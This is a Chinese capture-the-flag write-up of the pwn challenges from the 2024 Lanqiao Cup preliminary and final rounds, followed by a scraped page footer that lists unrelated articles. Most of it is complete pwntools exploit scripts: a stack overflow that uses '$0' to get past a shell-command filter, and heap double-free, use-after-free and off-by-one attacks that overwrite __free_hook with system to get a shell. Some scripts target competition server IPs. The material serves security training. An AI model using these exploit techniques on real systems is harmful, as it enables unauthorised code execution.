2024蓝桥杯初赛决赛pwn题全解

蓝桥杯初赛决赛pwn题解

  • 初赛
    • 第一题
    • 第二题
  • 决赛
    • getting_started
    • babyheap

初赛

第一题

在这里插入图片描述
有system函数,并且能在bss上读入字符

而且存在栈溢出,只要过掉check函数即可
check函数中,主要是对system常规获取权限的参数,进行了过滤,用$0即可

exp:

from pwn import *
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()

context(os='linux', arch='amd64', log_level='debug')
p = remote('', )
rl("restricted stack.\n")
pay=b'$0'
s(pay)

rl("...\n")
pay=b'a'*0x28+p64(0x0000000000400933)+p64(0x601090)+p64(0x400778)
s(pay)

sleep(0.5)
sl(b'exec 1>&0')


inter()

第二题

经典堆菜单题目
在这里插入图片描述
发现没有edit功能,考虑double free。版本为2.31 09.9

挨个分析
add函数,申请堆块部分
在这里插入图片描述
只能申请0x50大小的堆块,并且能读入0x50字节的大小内容

free部分,
free之后有置零,所以不存在uaf漏洞

在这里插入图片描述
show就是个正常打印
在这里插入图片描述

漏洞是在这个函数
在这里插入图片描述

在这里插入图片描述

没有置零关键部分,所以存在uaf漏洞,因为只能申请0x50大小的堆块,所以考虑使用fastbin的double free

具体思路:
先把tcachebin填满
之后利用后门函数free一个进fastbin,然后正常再free两个堆块(第二次free的是后门free的那一个)
以此构造出double free,然后把tcache bin全部申请回来,然后再申请一个fastbin的堆块,fastbin的其他堆块就会进入到tcache bin里,因为前面已经构造了double free,所以这次可以修改fd的末位,然后就能申请出来这个错位的堆块A,修改堆块的size,然后free进unsorted bin,之后申请一个小块B,泄露libc,然后free这个小块B,再free小块A(A需要提前伪造好size位)然后申请回来A,把B的fd改为free hook,然后打free hook为system即可

from pwn import *
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
p = remote('',)
libc = ELF('./libc.so.6')

def add(c):
	rl("4.exit\n")
	sl(str(1))
	sleep(0.2)
	s(c)

def free(i):
	rl("4.exit\n")
	sl(str(2))
	sleep(0.2)
	sl(str(i))

def show(i):
	rl("4.exit\n")
	sl(str(3))
	sleep(0.2)
	sl(str(i))

def free2(i):
	rl("4.exit\n")
	sl(str(0x202405))
	sleep(0.5)
	sl(str(i))

add(b'\x00'*0x38+p64(0x61))
add(b'\x00'*0x28+p64(0x61))
for i in range(12):
	add(b'a') #为伪造size做准备
for i in range(7):
	free(i+2)
free(9)
free(10)
free2(0)
free(1)
free(0)
for i in range(7):
	add(b'a')
add(b'\x30')
add(b'a')
add(b'a')
add(b'\x00'*0x28+p64(0x421)) #修改size位
free(6)
add(b'a')
show(6)
libc_base=get_addr()-0x1ecf61
li(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
li(hex(free_hook))
system,bin=get_sb()
free(11)
free(6)
free(10)
add(b'\x00'*0x28+p64(0x61)+p64(free_hook)) #修改fd位
add(b'/bin/sh\x00')
add(p64(system))
free(10)

inter()

哪里不明白,调试调试就行了

决赛

getting_started

比赛的时候,先看的这个题目,本地打通的了,远程打不通,这个随机值纯看脸,我脸黑,重开靶机10次左右,才打通,但是没血了

以时间为种子产生随机值
在这里插入图片描述

然后就是一个栈溢出
在这里插入图片描述

这个开启pie了,并且没法泄露东西,所以就正常输入随机值了
之后就是一个菜单题目
在这里插入图片描述
add函数,最大申请0x100的堆块
在这里插入图片描述

漏洞在edit里
在这里插入图片描述

在这里插入图片描述

这是先读入后判断,所以存在off by one,实际还有个null
思路就是利用off by one修改size,构造堆块重叠

利用思路
因为堆块限制的不强,所以直接free满tc,进入unsorted,之后再申请回来一部分,然后show出来libc
然后,off by one构造堆块重叠,利用重叠的堆块,修改fd,申请到free hook,然后打free hook为system

exp:

from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
import gmpy2
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_addr1():
    return u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
#p = process('./pwn')
p = remote('39.106.48.123', 22289)
elf = ELF('./pwn')
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
#libc = ELF('./libc-2.31.so')

def add(idx,size):
	rl(":")
	sl(str(1))
	rl("Index: ")
	sl(str(idx))
	rl("Size ")
	sl(str(size))

def edit(idx,c):
	rl(":")
	sl(str(2))
	rl("Index: ")
	sl(str(idx))
	rl("Content: ")
	s(c)

def show(idx):
	rl(":")
	sl(str(3))
	rl("Index: ")
	sl(str(idx))

def free(idx):
	rl(":")
	sl(str(4))
	rl("Index: ")
	sl(str(idx))



libc = cdll.LoadLibrary('./libc-2.27.so')
seed =libc.time(0)
srand = libc.srand(seed)

a=[0,0,0,0,0,0,0,0,0,0]
for i in range(7):
	a[i]=int(str(libc.rand()% 80 + 32).encode())
rl("please login >>>>\n")
pay=p8(a[0])+p8(a[1])+p8(a[2])+p8(a[3])+p8(a[4])+p8(a[5])+p8(a[6])
sl(pay)


libc=ELF("./libc-2.27.so")

for i in range(10):
	add(i,0x90)
for i in range(7):
	free(i)

free(7)
show(7)
for i in range(7):
	add(i,0x90)
add(7,0x20)
show(7)
libc_base=get_addr()-0x3ebd30
li(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
system,bin=get_sb()
for i in range(11):
	add(i+10,0x68)

edit(17,b'a'*0x68+p8(0xe1))
free(18)
free(19)
add(18,0xd8)
edit(18,b'a'*0x68+p64(0x71)+p64(free_hook)+b'\n')
add(27,0x68)
edit(27,b'/bin/sh\x00\n')
add(28,0x68)
edit(28,p64(system)+b'\n')
free(27)


inter()

babyheap

同样也是4个功能
在这里插入图片描述

申请给限制到0-0x60
在这里插入图片描述

有个后门可以申请一个大堆块
在这里插入图片描述
free函数中存在uaf漏洞
在这里插入图片描述

这个题目和初赛的第二题有点像,这个题目更好布置堆块
也是通过double free,修改fd的末位,不过这个要小布置一下堆块,因为这个edit会在末位填上null,申请出来错位的堆块A,修改一下size,free进unsorted,然后show出libc,取出来这个堆块(A包含的堆块),free进tc里,通过A修改它的fd为free hook,然后打free hook为system

exp:

from pwn import *
from struct import pack
from ctypes import *
from LibcSearcher import *
import base64
import gmpy2
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
def s(a):
    p.send(a)
def sa(a, b):
    p.sendafter(a, b)
def sl(a):
    p.sendline(a)
def sla(a, b):
    p.sendlineafter(a, b)
def r():
    p.recv()
def pr():
    print(p.recv())
def rl(a):
    return p.recvuntil(a)
def inter():
    p.interactive()
def bug():
    gdb.attach(p)
    pause()
def get_addr():
    return u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_sb():
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

context(os='linux', arch='amd64', log_level='debug')
p = remote('8.147.132.99',23464)
elf = ELF('./pwn')
libc=ELF("./libc.so.6")

def add(idx,size):
	rl(">> \n")
	sl(str(1))
	rl("index: \n")
	sl(str(idx))
	rl("size: ")
	sl(str(size))
	
def free(idx):
	rl(">> \n")
	sl(str(2))
	rl("index: \n")
	sl(str(idx))

def edit(idx,c):
	rl(">> \n")
	sl(str(3))
	rl("index: \n")
	sl(str(idx))
	rl("contents: \n")
	s(c)

def show(idx):
	rl(">> \n")
	sl(str(4))
	rl("index: \n")
	sl(str(idx))
def add2(size):
	rl(">> \n")
	sl(str(555))
	rl("find me\n")
	sl(str(size))


add(0,0x60)
add(1,0x60)
add2(0x400)
add(2,0x60)

free(1)
free(0)
edit(0,b'\n')
add(3,0x60)
add(4,0x60)
edit(4,p64(0)+p64(0x481)+b'\n')
free(1)
show(1)
libc_base=get_addr()-96-0x10-libc.sym['__malloc_hook']
li(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
system,bin=get_sb()


add(5,0x60)
free(2)
free(5)
edit(4,p64(0)+p64(0x71)+p64(free_hook)+b'\n')
add(6,0x60)
edit(6,b'/bin/sh\x00\n')
add(7,0x60)
edit(7,p64(system)+b'\n')
free(6)

	
inter()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/679915.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

软件测试总结基础

软件测试总结基础 1. 何为软件测试 定义:使用技术手段验证软件是否满足需求 目的:减少bug,保证质量 2. 软件测试分类 阶段划分 单元测试,针对源代码进行测试集成测试,针对接口进行测试系统测试,针对功能…

声音的归宿:恢复手机录音的3个步骤与策略

“手机录音删除了怎么恢复,没有云备份。本人平时喜欢用手机录音机录一些唱的歌,上次录过之后就再也没有打开,今天一打开发现上个月的录音都没了!里面都是我的歌,还有期末重点,还有声乐课的录的音频&#xf…

免费工具扫描 Linux 中已知威胁

首发公众号网络研究观,关注获取更多。 卡巴斯基为 Linux 平台发布了一款名为 KVRT 的新病毒清除工具,允许用户免费扫描他们的系统并清除恶意软件和其他已知威胁。 尽管人们普遍误以为 Linux 系统本质上是安全的,不会受到威胁,但不…

jeecg dictText字典值

前端列表的字典值回显,配置了数据字典后,在本地测试可以回显中文的数据, 但在线上服务器不能正常回显出来; 原因是在前端拿到records的列表值时可以拿到dictText的字典,但是线上服务器没有dictText的值; …

对称二叉树[简单]

优质博文:IT-BLOG-CN 一、题目 给你一个二叉树的根节点root, 检查它是否轴对称。 示例 1: 输入:root [1,2,2,3,4,4,3] 输出:true 示例 2: 输入:root [1,2,2,null,3,null,3] 输出&#xf…

YOLOv5改进 | Conv篇 | 利用YOLOv10提出的SCDown魔改YOLOv5进行下采样(附代码 + 结构图 + 添加教程)

一、本文介绍 本文给大家带来的改进机制是利用YOLOv10提出的SCDown魔改YOLOv5进行下采样,其是更高效的下采样。具体而言,其首先利用点卷积调整通道维度,然后利用深度卷积进行空间下采样。这将计算成本减少到和参数数量减少到。同时&#xff…

5.透明效果

实时渲染中要实现透明效果,通常会在渲染模型时控制它的透明通道(Alpha channel)。 当一个物体被渲染到屏幕上时,每个片元除了颜色和深度值之外,它还有另一个属性—透明度。 当透明度为1时,表示该像素是完…

信息系统项目管理师0141:产品范围和项目范围(9项目范围管理—9.1管理基础—9.1.1产品范围和项目范围)

点击查看专栏目录 文章目录 第9章 项目范围管理9.1 管理基础9.1.1 产品范围和项目范围 第9章 项目范围管理 项目范围管理包括确保项目做且只做所需的全部工作,以成功完成项目。项目范围管理主要在于定义和控制哪些工作应该包括在项目内,哪些不应该包含在…

Golang | Leetcode Golang题解之第131题分割回文串

题目: 题解: func partition(s string) (ans [][]string) {n : len(s)f : make([][]int8, n)for i : range f {f[i] make([]int8, n)}// 0 表示尚未搜索,1 表示是回文串,-1 表示不是回文串var isPalindrome func(i, j int) int8…

数据结构与算法之Floyd弗洛伊德算法求最短路径

目录 前言 Floyd弗洛伊德算法 定义 步骤 一、初始化 二、添加中间点 三、迭代 四、得出结果 时间复杂度 代码实现 结束语 前言 今天是坚持写博客的第18天,希望可以继续坚持在写博客的路上走下去。我们今天来看看数据结构与算法当中的弗洛伊德算法。 Flo…

如何学习SQL?YouTube近百万粉丝技术频道的学习路径图。

大家好,我是王有志,一个分享硬核 Java 技术的金融摸鱼侠,欢迎大家加入 Java 人自己的交流群“共同富裕的 Java 人”。 ByteByteGo 频道在 5 月 30 日的通信邮件中提到了“How to Learn SQL”这一主题,并给出了一张详细的学习路径…

python——网络编程

流程图 面向连接的套接字 面向连接的通信提供序列化的、可靠的和不重复的数据交付,而没有记录边界。主要的协议是传输控制协议(TCP); TCP套接字,在python中,必须使用SOCK_STREAM作为套接字类型 tcp的特点 面向连接…

使用GitHub托管静态网页

前言​: 如果没有服务器,也没有域名,又想部署静态网页的同学,那就可以尝试使用GitHub托管自己的网页​。 正文: 首先要有自己的GitHub的账号,如果没有可以自己搜索官网进行注册登录,国内对Gi…

深入了解 C 语言 Bug

目录 一、引言二、Bug的定义三、Bug的由来四、Bug的影响五、应对 Bug 的方法六、结论 一、引言 1、在 C 语言的编程世界中,Bug 是一个我们无法回避的话题。 2、Bug,简单来说,就是程序中存在的错误或缺陷。它可以表现为程序运行结果的异常、崩…

容器运行nslookup提示bash: nslookup: command not found【笔记】

在容器中提示bash: nslookup: command not found,表示容器中没有安装nslookup命令。 可以通过以下命令安装nslookup: 对于基于Debian/Ubuntu的容器,使用以下命令: apt-get update apt-get install -y dnsutils对于基于CentOS/R…

机器学习、深度学习模型建模开发过程中常见的评估指标汇总学习记录

在机器学习、深度学习模型的开发过程中, 很重要的一个环节就是要对模型的性能进行评估分析,不同类型的任务不同的模型对应使用不同的评估指标体系,本文的主要目的是正好趁着最近有这块的需求,就想着找点时间把汇总学习的内容整理记…

TypeScript学习(一):开发环境搭建

官方文档搭建参考 https://learn.microsoft.com/zh-cn/training/modules/typescript-get-started/ 1.下载node.js https://nodejs.org/en/download 2.下载vscode https://code.visualstudio.com/ 3.在线ts的测试工具 https://www.typescriptlang.org/play/ 4.下载typescr…

Linux线程安全:线程互斥

一、线程互斥的概念 1.1临界资源与互斥的关系 临界资源:多线程执行流共享的资源就叫做临界资源。 临界区:每个线程内部,访问临界资源的代码,就叫做临界区。 互斥:任何时刻,互斥保证有且只有一个执行流进入…

274 基于matlab的随机粗糙表面对微气体轴承内气体压强分布的影响

基于matlab的随机粗糙表面对微气体轴承内气体压强分布的影响。采用差分法求解气体轴承的雷诺方程,通过尺寸参数、分形维数对粗糙度表面设置,滑流参数设置,实现气压分布可视化结果显示。程序已调通,可直接运行。 274 气体轴承 随机…

软件设计,建模及需求分析

文章目录 设计原则建模及需求分析重构 设计原则 SOLID原则 单一职责 开闭 (扩展开放,修改关闭) 里氏替换 (父类出现地方都可以用子类替换) 接口隔离 依赖倒置(高层模块不依赖低层,两层都依…